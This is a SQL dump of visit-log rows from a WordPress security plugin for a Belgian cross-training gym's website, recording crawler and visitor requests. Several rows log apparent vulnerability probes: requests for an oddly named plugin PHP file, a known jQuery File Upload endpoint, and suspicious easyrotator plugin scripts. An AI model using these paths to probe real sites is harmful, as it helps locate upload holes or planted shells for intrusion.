(76495, 1498902663.924674, 1600959247, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76496, 1498903200.325592, 2366145549, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76497, 1498904741.312288, 621375758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76498, 1498904773.172297, 621375751, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76499, 1498905735.373823, 1600967971, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76500, 1498918851.864719, 3512961611, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(76501, 1498925644.462657, 96260904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76502, 1498925645.822029, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76503, 1498925646.398792, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76504, 1498925647.063392, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76505, 1498925647.699761, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76506, 1498925648.469967, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76507, 1498925649.114388, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76508, 1498926968.947968, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76509, 1498926969.430181, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76510, 1498926969.885207, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76511, 1498926970.407289, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76512, 1498926970.922669, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76513, 1498926971.452161, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76514, 1498926971.832241, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76515, 1498926972.268849, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76516, 1498926972.670813, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76517, 1498926973.078730, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76518, 1498926973.489071, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76519, 1498926973.951902, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76520, 1498926974.346896, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76521, 1498926974.739169, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76522, 1498929997.909946, 1355389035, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76523, 1498929999.620944, 1355389035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76524, 1498930114.474957, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76525, 1498930130.461323, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76526, 1498930133.274535, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76527, 1498930154.243128, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76528, 1498930158.397218, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76529, 1498940268.913731, 1355291200, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76530, 1498940271.398981, 1355291200, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76531, 1498940284.892237, 1355291200, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76532, 1498940304.370453, 1355291200, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76533, 1498940590.918059, 1355291200, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76534, 1498941880.144328, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76535, 1498942757.394395, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76536, 1498942758.021563, 3652617276, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76537, 1498945222.860274, 620875541, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76538, 1498945305.344194, 867140598, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'),
(76539, 1498961866.987791, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(76540, 1498973143.732216, 1592839955, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/fAaWBH.php', 'http://crosstrainingcenter.be/wp-content/plugins/fAaWBH.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76541, 1498978655.656130, 1837161381, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G389F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76542, 1498978658.078248, 1837161381, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G389F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76543, 1498979602.332834, 1998329142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0'),
(76544, 1498988865.219998, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(76545, 1498988865.831089, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76546, 1498988866.236279, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76547, 1498988867.683249, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76548, 1498988868.473972, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76549, 1498988868.945729, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76550, 1498988869.455219, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76551, 1498988870.083151, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76552, 1498988870.490451, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76553, 1498988870.895590, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76554, 1498988871.288214, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76555, 1498988871.738647, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76556, 1498988872.124103, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76557, 1498988872.512902, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76558, 1498991810.147928, 1375116379, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G935F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76559, 1498991811.946568, 1375116379, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G935F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76560, 1498992579.922099, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(76561, 1498993400.010882, 3645212881, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)'),
(76562, 1498994002.679364, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/', 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(76563, 1498994041.921255, 3645212875, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)'),
(76564, 1498994108.150573, 3645212876, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', 'http://crosstrainingcenter.be/sitemap.xml', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)'),
(76565, 1498995693.127977, 1538359134, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76566, 1498995695.192618, 1538359134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76567, 1498995726.080935, 1538359134, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76568, 1498995778.726734, 1538359134, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76569, 1498995830.675598, 1538359134, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76570, 1499005104.457729, 3475901892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76571, 1499012969.711904, 1338304785, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76572, 1499015105.432059, 1401346405, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G900F Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76573, 1499015108.234844, 1401346405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G900F Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76574, 1499021276.093685, 520974776, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76575, 1499021276.358442, 1837264142, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://m.facebook.com/', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0'),
(76576, 1499021278.446751, 1837264142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0.1) Gecko/54.0.1 Firefox/54.0.1'),
(76577, 1499021291.717312, 1837264142, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0'),
(76578, 1499021293.889684, 1837264142, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0'),
(76579, 1499022637.254015, 2509962139, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(76580, 1499032223.289941, 1338304785, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76581, 1499041558.543519, 1338304785, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76582, 1499048331.207497, 3475901894, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76583, 1499050529.367686, 3024883608, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/js/\\\'+m.iframeSrc+\\\'', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76584, 1499055354.387077, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76585, 1499057886.035454, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76586, 1499060059.570363, 1600967943, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76587, 1499061155.215375, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76588, 1499061395.626554, 1049233589, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76589, 1499061399.892016, 1049233589, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76590, 1499061421.391470, 1049233589, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76591, 1499066085.583431, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76592, 1499072012.726909, 1168357651, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/c.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76593, 1499072173.848474, 1731763595, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/one.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76594, 1499074720.921963, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76595, 1499075332.430379, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76596, 1499075332.917727, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76597, 1499075483.733789, 1463838565, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(76598, 1499075500.004438, 1463838565, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(76599, 1499075500.877190, 1463838565, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(76600, 1499075501.518509, 1463838565, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(76601, 1499076627.203864, 3250520646, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76602, 1499076629.134280, 3250520646, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76603, 1499076660.329841, 3250520646, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiu7YHa7-zUAhVGZ1AKHVJODZ0QFggvMAE&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Flequipe%2F&usg=AFQjCNEwoxlHryNYgAimC6M0_H4bYObfZQ', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76604, 1499076661.432300, 3250520646, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
